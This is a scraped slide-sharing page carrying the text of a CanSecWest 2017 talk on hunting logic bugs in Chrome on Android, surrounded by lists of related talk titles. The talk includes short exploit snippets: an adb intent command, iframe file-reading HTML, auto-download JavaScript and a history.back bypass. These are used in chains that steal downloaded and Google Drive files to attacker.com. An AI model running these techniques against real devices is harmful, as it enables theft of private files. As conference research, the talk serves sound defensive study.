HTML5 is the Future of Mobile, PhoneGap Takes You There TodayHTML5 is the Future of Mobile, PhoneGap Takes You There Today
HTML5 is the Future of Mobile, PhoneGap Takes You There Todaydavyjones
 
I haz you and pwn your maal
I haz you and pwn your maalI haz you and pwn your maal
I haz you and pwn your maal
c0c0n - International Cyber Security and Policing Conference
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
SQALab
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
Oles Seheda
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
Area41
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014
Chong-Kuan Chen
 

Similar to CSW2017 Geshev+Miller logic bug hunting in chrome on android (20)

Zombie browsers spiced with rootkit extensions - DefCamp 2012
Zombie browsers spiced with rootkit extensions - DefCamp 2012Zombie browsers spiced with rootkit extensions - DefCamp 2012
Zombie browsers spiced with rootkit extensions - DefCamp 2012
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
 
Attacking and Defending Mobile Applications
Attacking and Defending Mobile ApplicationsAttacking and Defending Mobile Applications
Attacking and Defending Mobile Applications
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013
 
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
 
Hacktivityonly 121013141039-phpapp02
Hacktivityonly 121013141039-phpapp02Hacktivityonly 121013141039-phpapp02
Hacktivityonly 121013141039-phpapp02
 
[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security Workshop[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security Workshop
 
Outsmarting SmartPhones
Outsmarting SmartPhonesOutsmarting SmartPhones
Outsmarting SmartPhones
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdf
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
 
13 practical tips for writing secure golang applications
13 practical tips for writing secure golang applications13 practical tips for writing secure golang applications
13 practical tips for writing secure golang applications
 
Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)
 
Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Android Penetration Testing - Day 3
Android Penetration Testing - Day 3
 
I haz you and pwn your maal
I haz you and pwn your maalI haz you and pwn your maal
I haz you and pwn your maal
 
HTML5 is the Future of Mobile, PhoneGap Takes You There Today
HTML5 is the Future of Mobile, PhoneGap Takes You There TodayHTML5 is the Future of Mobile, PhoneGap Takes You There Today
HTML5 is the Future of Mobile, PhoneGap Takes You There Today
 
I haz you and pwn your maal
I haz you and pwn your maalI haz you and pwn your maal
I haz you and pwn your maal
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014
 

More from CanSecWest

CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CanSecWest
 
CSW2017 jun li_car anomaly detection
CSW2017 jun li_car anomaly detectionCSW2017 jun li_car anomaly detection
CSW2017 jun li_car anomaly detection
CanSecWest
 
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CanSecWest
 
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
CSW2017 Weston miller csw17_mitigating_native_remote_code_executionCSW2017 Weston miller csw17_mitigating_native_remote_code_execution
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
CanSecWest
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CanSecWest
 
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_markCSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CanSecWest
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CanSecWest
 
CSW2017 Enrico branca What if encrypted communications are not as secure as w...
CSW2017 Enrico branca What if encrypted communications are not as secure as w...CSW2017 Enrico branca What if encrypted communications are not as secure as w...
CSW2017 Enrico branca What if encrypted communications are not as secure as w...
CanSecWest
 
CSW2017 Mickey+maggie low cost radio attacks on modern platforms
CSW2017 Mickey+maggie low cost radio attacks on modern platformsCSW2017 Mickey+maggie low cost radio attacks on modern platforms
CSW2017 Mickey+maggie low cost radio attacks on modern platforms
CanSecWest
 
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CanSecWest
 
CSW2017 Harri hursti csw17 final
CSW2017 Harri hursti csw17 finalCSW2017 Harri hursti csw17 final
CSW2017 Harri hursti csw17 final
CanSecWest
 
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CanSecWest
 
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CanSecWest
 
CSW2017 Scott kelly secureboot-csw2017-v1
CSW2017 Scott kelly secureboot-csw2017-v1CSW2017 Scott kelly secureboot-csw2017-v1
CSW2017 Scott kelly secureboot-csw2017-v1
CanSecWest
 
CSW2017 Qidan he+Gengming liu_cansecwest2017
CSW2017 Qidan he+Gengming liu_cansecwest2017CSW2017 Qidan he+Gengming liu_cansecwest2017
CSW2017 Qidan he+Gengming liu_cansecwest2017
CanSecWest
 
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CanSecWest
 
Csw2016 chen grassi-he-apple_graphics_is_compromised
Csw2016 chen grassi-he-apple_graphics_is_compromisedCsw2016 chen grassi-he-apple_graphics_is_compromised
Csw2016 chen grassi-he-apple_graphics_is_compromised
CanSecWest
 
Csw2016 song li-smart_wars
Csw2016 song li-smart_warsCsw2016 song li-smart_wars
Csw2016 song li-smart_wars
CanSecWest
 
Csw2016 tang virtualization_device emulator testing technology
Csw2016 tang virtualization_device emulator testing technologyCsw2016 tang virtualization_device emulator testing technology
Csw2016 tang virtualization_device emulator testing technology
CanSecWest
 

More from CanSecWest (20)

CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
 
CSW2017 jun li_car anomaly detection
CSW2017 jun li_car anomaly detectionCSW2017 jun li_car anomaly detection
CSW2017 jun li_car anomaly detection
 
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
 
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
CSW2017 Weston miller csw17_mitigating_native_remote_code_executionCSW2017 Weston miller csw17_mitigating_native_remote_code_execution
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
 
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_markCSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
 
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
 
CSW2017 Enrico branca What if encrypted communications are not as secure as w...
CSW2017 Enrico branca What if encrypted communications are not as secure as w...CSW2017 Enrico branca What if encrypted communications are not as secure as w...
CSW2017 Enrico branca What if encrypted communications are not as secure as w...
 
CSW2017 Mickey+maggie low cost radio attacks on modern platforms
CSW2017 Mickey+maggie low cost radio attacks on modern platformsCSW2017 Mickey+maggie low cost radio attacks on modern platforms
CSW2017 Mickey+maggie low cost radio attacks on modern platforms
 
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
 
CSW2017 Harri hursti csw17 final
CSW2017 Harri hursti csw17 finalCSW2017 Harri hursti csw17 final
CSW2017 Harri hursti csw17 final
 
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
 
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
 
CSW2017 Scott kelly secureboot-csw2017-v1
CSW2017 Scott kelly secureboot-csw2017-v1CSW2017 Scott kelly secureboot-csw2017-v1
CSW2017 Scott kelly secureboot-csw2017-v1
 
CSW2017 Qidan he+Gengming liu_cansecwest2017
CSW2017 Qidan he+Gengming liu_cansecwest2017CSW2017 Qidan he+Gengming liu_cansecwest2017
CSW2017 Qidan he+Gengming liu_cansecwest2017
 
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
 
Csw2016 chen grassi-he-apple_graphics_is_compromised
Csw2016 chen grassi-he-apple_graphics_is_compromisedCsw2016 chen grassi-he-apple_graphics_is_compromised
Csw2016 chen grassi-he-apple_graphics_is_compromised
 
Csw2016 song li-smart_wars
Csw2016 song li-smart_warsCsw2016 song li-smart_wars
Csw2016 song li-smart_wars
 
Csw2016 tang virtualization_device emulator testing technology
Csw2016 tang virtualization_device emulator testing technologyCsw2016 tang virtualization_device emulator testing technology
Csw2016 tang virtualization_device emulator testing technology
 

Recently uploaded

Living-in-IT-era-Module-7-Imaging-and-Design-for-Social-Impact.pptx
Living-in-IT-era-Module-7-Imaging-and-Design-for-Social-Impact.pptxLiving-in-IT-era-Module-7-Imaging-and-Design-for-Social-Impact.pptx
Living-in-IT-era-Module-7-Imaging-and-Design-for-Social-Impact.pptx
TristanJasperRamos
 
Multi-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesMulti-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Multi-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Sanjeev Rampal
 
BASIC C++ lecture NOTE C++ lecture 3.pptx
BASIC C++ lecture NOTE C++ lecture 3.pptxBASIC C++ lecture NOTE C++ lecture 3.pptx
BASIC C++ lecture NOTE C++ lecture 3.pptx
natyesu
 
This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!
nirahealhty
 
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shopHistory+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
laozhuseo02
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
3ipehhoa
 
test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
Arif0071
 
Output determination SAP S4 HANA SAP SD CC
Output determination SAP S4 HANA SAP SD CCOutput determination SAP S4 HANA SAP SD CC
Output determination SAP S4 HANA SAP SD CC
ShahulHameed54211
 
ER(Entity Relationship) Diagram for online shopping - TAE
ER(Entity Relationship) Diagram for online shopping - TAEER(Entity Relationship) Diagram for online shopping - TAE
ER(Entity Relationship) Diagram for online shopping - TAE
Himani415946
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
JeyaPerumal1
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
3ipehhoa
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
Rogerio Filho
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
3ipehhoa
 
The+Prospects+of+E-Commerce+in+China.pptx
The+Prospects+of+E-Commerce+in+China.pptxThe+Prospects+of+E-Commerce+in+China.pptx
The+Prospects+of+E-Commerce+in+China.pptx
laozhuseo02
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
Gal Baras
 
Latest trends in computer networking.pptx
Latest trends in computer networking.pptxLatest trends in computer networking.pptx
Latest trends in computer networking.pptx
JungkooksNonexistent
 

Recently uploaded (16)

Living-in-IT-era-Module-7-Imaging-and-Design-for-Social-Impact.pptx
Living-in-IT-era-Module-7-Imaging-and-Design-for-Social-Impact.pptxLiving-in-IT-era-Module-7-Imaging-and-Design-for-Social-Impact.pptx
Living-in-IT-era-Module-7-Imaging-and-Design-for-Social-Impact.pptx
 
Multi-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesMulti-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Multi-cluster Kubernetes Networking- Patterns, Projects and Guidelines
 
BASIC C++ lecture NOTE C++ lecture 3.pptx
BASIC C++ lecture NOTE C++ lecture 3.pptxBASIC C++ lecture NOTE C++ lecture 3.pptx
BASIC C++ lecture NOTE C++ lecture 3.pptx
 
This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!
 
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shopHistory+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
 
test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
 
Output determination SAP S4 HANA SAP SD CC
Output determination SAP S4 HANA SAP SD CCOutput determination SAP S4 HANA SAP SD CC
Output determination SAP S4 HANA SAP SD CC
 
ER(Entity Relationship) Diagram for online shopping - TAE
ER(Entity Relationship) Diagram for online shopping - TAEER(Entity Relationship) Diagram for online shopping - TAE
ER(Entity Relationship) Diagram for online shopping - TAE
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
 
The+Prospects+of+E-Commerce+in+China.pptx
The+Prospects+of+E-Commerce+in+China.pptxThe+Prospects+of+E-Commerce+in+China.pptx
The+Prospects+of+E-Commerce+in+China.pptx
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
 
Latest trends in computer networking.pptx
Latest trends in computer networking.pptxLatest trends in computer networking.pptx
Latest trends in computer networking.pptx
 

CSW2017 Geshev+Miller logic bug hunting in chrome on android

  • 1. Logic Bug Hunting in Chrome on Android CanSecWest 17 March, 2017
  • 2. Agenda • Fuzzing and memory corruptions • Introduction to logic flaws • General approach to hunting logic bugs • Application in Mobile Pwn2Own 2016 • Exploit improvement
  • 4. Fuzzing and Pwn2Own • Fuzzing has become mainstream • AFL, LibFuzzer, Radamsa, Honggfuzz, etc. • It’s almost too easy… • People find and kill bugs they rarely understand… • Increasing likelihood of duplicates • libstagefright, Chrome, etc. • Code changes • Improved exploit mitigations
  • 5. Android Mitigations • More and better security mechanisms • Improved rights management, SELinux, TrustZone • ASLR, DEP, PIE, RELRO, PartitionAlloc, Improved GC • Significant increase in exploit development time • Multiple bugs are usually chained together • PoC isn’t enough for the competition • We can’t afford spending too much time on Pwn2Own
  • 6. Memory Corruptions vs. Logic Flaws • Memory corruptions • Programming errors • Memory safety violations • Architecture-dependent • General mitigations • Logic flaws • Design vulnerabilities • Intended behaviour • Architecture-agnostic • Lack of general mitigation mechanisms
  • 7. We Love Logic Bugs • Equally beautiful and hilarious vectors • Basic tools • Actual exploits might be somewhat convoluted Q: How many bugs do you have in your chain? A: We abuse one and a half features. Q: What tool did you use to find that bug? A: Notepad.
  • 12. Identifying Logic Flaws • I don’t know what I’m doing… • Lack of one-size-fits-all methodology • Thou shalt know thy target • Less known or obscure features • Trust boundaries and boundary violations • Threat modelling
  • 16. Mobile Pwn2Own 2016 “All entries must compromise the devices by browsing to web content […] or by viewing/receiving an MMS/SMS message.” http://zerodayinitiative.com/MobilePwn2Own2016Rules.html Category Phone Price (USD) Obtaining Sensitive Information Apple iPhone $50,000 Google Nexus $50,000 Samsung Galaxy $35,000 Install Rogue Application Apple iPhone $125,000 Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000
  • 17. Where do we start? • Ruling out SMS/MMS • Limited to media rendering bugs • Chrome • Core components • URI handlers • IPC to other applications
  • 18. Google Admin • Case study from 2015
  • 19. Google Admin <activity android:name="com.google.android.apps. enterprise.cpanel.activities.ResetPinActivity"> <intent-filter> <action android:name="android.intent.action.VIEW"/> <category android:name="android.intent.category.DEFAULT"/> <category android:name="android.intent.category.BROWSABLE"/> <data android:host="localhost" android:scheme="http"/> </intent-filter> </activity> AndroidManifest.xml
  • 20. Google Admin public void onCreate(Bundle arg3) { this.c = this.getIntent().getExtras().getString("setup_url"); this.b.loadUrl(this.c); // ... } ResetPinActivity.java
  • 21. Google Admin • Attacking with malware adb shell am start –d http://localhost/foo -e setup_url file:////data/data/com.malware/file.html
  • 22. Google Admin Chrome file:///tmp/foo.html Uncaught DOMException: Blocked a frame with origin "null" from accessing a cross-origin frame. <HTML><BODY> <IFRAME SRC="file:///tmp/foo.html" id="foo" onLoad="console.log(document.getElementById('foo').contentDocument.body.innerHTML);"> </IFRAME> </BODY></HTML>
  • 23. Google Admin Chrome on Android API 17 file:///sdcard/foo.html Yep, that’s fine! <HTML><BODY> <IFRAME SRC="file:///sdcard/foo.html" id="foo" onLoad="console.log(document.getelementById('foo').contentDocument.body.innerHTML);"> </IFRAME> </BODY></HTML>
  • 24. Google Admin • Malicious app creates a world readable file, e.g. foo.html • foo.html will load an iframe with src = “foo.html” after a small delay • Sends a URL for foo.html to Google Admin via IPC • Change foo.html to be a symbolic link pointing to a file in the Google Admin’s sandbox • Post file contents back to a web server
  • 25. Same-Origin Policy • Chrome for Android vs. Chrome • Different SOP • Custom Android schemes • Worth investigating…
  • 26. SOP in Chrome for Android HTTP / HTTPS Scheme, domain and port number must match. FILE Full file path for origin until API 23. Starting with API 24, all origins are now NULL. CONTENT Scheme, domain and port number must match. DATA All origins are NULL.
  • 27. Jumping Origins HTTP / HTTPS FILE CONTENT DATA HTTP / HTTPS ✓ ✘ ✓ ✓ FILE ✓ ✓ ✓ ✓ CONTENT ✓ ✘ ✓ ✓ DATA ✓ ✘ ✓ ✓ Destination Scheme SourceScheme
  • 28. Android Content Providers • Implement data repositories • Exportable for external access • Declared in AndroidManifest.xml • Read and write access control • Content URIs • Combination of ‘authority’ and ‘path’ • content://<authority><path> • content://downloads/my_downloads/45 • What about SOP?
  • 29. Android Download Manager • System service that handles long-running HTTP downloads • Back to SOP… content://downloads/my_downloads/45 content://downloads/my_downloads/46 content://downloads/my_downloads/102
  • 30. Automatic File Downloads • Thank you, HTML5! • Confirmed to work in Chrome • <a href=“foo.html” download> • <a href=“foo.html” download=“bar.html"> • Zero user interaction • Link click using JavaScript • Perfect for Pwn2Own
  • 31. Automatic File Downloads <a id='foo' href='evil.html' download> link </a> <script> document.getElementById('foo').click(); </script>
  • 32. Exploit #1 – Stealing Downloaded Files GET /index.html index.html Attacker’s Web Server Victim’s Browser Android Download Manager
  • 33. Exploit #1 – Stealing Downloaded Files GET /index.html index.html https://attacker.com/index.html Attacker’s Web Server Victim’s Browser Android Download Manager
  • 34. Exploit #1 – Stealing Downloaded Files GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) Attacker’s Web Server Victim’s Browser Android Download Manager
  • 35. Exploit #1 – Stealing Downloaded Files GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) https://attacker.com/index.html Attacker’s Web Server Victim’s Browser Android Download Manager
  • 36. Exploit #1 – Stealing Downloaded Files GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) GET my_downloads/54 evil.html Attacker’s Web Server Victim’s Browser Android Download Manager
  • 37. Exploit #1 – Stealing Downloaded Files GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) GET my_downloads/54 evil.html content://downloads/my_downloads/54 Attacker’s Web Server Victim’s Browser Android Download Manager
  • 38. Exploit #1 – Stealing Downloaded Files GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) GET my_downloads/54 evil.html GET my_downloads/53 secrets.pdf secrets.pdf Attacker’s Web Server Victim’s Browser Android Download Manager
  • 39. Mobile Pwn2Own 2016 Category Phone Price (USD) Obtaining Sensitive Information Apple iPhone $50,000 Google Nexus $50,000 Samsung Galaxy $35,000 Install Rogue Application Apple iPhone $125,000 Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000
  • 40. Exploit Enhancement • Downloading arbitrary files • User sessions <a id='foo' href='https://drive.google.com/my_drive.html' download> link </a> <script> document.getElementById('foo').click(); </script>
  • 41. Multiple File Downloads • Multiple automatic downloads from the same page are forbidden
  • 42. Multiple File Downloads Restriction Bypass • However… page1.html page2.html <meta http-equiv="refresh" content="0; url=page2.html" /> <script> window.history.back(); </script>
  • 43. evil.html (download) Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager
  • 44. evil.html (download) Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager content://downloads/my_downloads/54
  • 45. evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager
  • 46. evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html GET my_downloads/55 my_drive.html my_drive.html (download) Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager
  • 47. evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html GET my_downloads/55 my_drive.html my_drive.html (download) bounce.html GET /bounce.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager https://attacker.com/bounce.html
  • 48. evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html GET my_downloads/55 my_drive.html my_drive.html (download) bounce.html history.back(); GET /bounce.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager content://downloads/my_downloads/54
  • 49. evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html GET my_downloads/55 my_drive.html my_drive.html (download) bounce.html GET /img?id=12345678 img_foo.jpg (download) history.back(); GET /bounce.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager
